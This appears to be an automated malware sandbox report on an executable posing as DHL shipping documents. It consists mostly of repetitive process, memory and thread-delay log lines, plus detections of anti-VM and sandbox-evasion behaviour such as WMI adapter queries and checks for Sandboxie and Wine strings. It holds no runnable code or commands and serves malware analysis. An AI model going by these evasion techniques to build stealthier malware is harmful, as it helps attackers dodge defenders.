                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory allocated: 22037E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeMemory allocated: 22051830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACDE10F0 sldt word ptr [eax]0_2_00007FFAACDE10F0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599762Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599615Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599374Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599262Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599044Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598823Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598428Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595343Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595015Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594904Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593901Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593795Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7928Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1627Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2934Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6865Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599762s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599615s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599484s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599374s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599262s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -599044s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598823s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598687s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598428s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -598156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597640s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597312s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -597094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596765s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596543s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2020Thread sleep time: -596000s >= -30000sJump to behavior
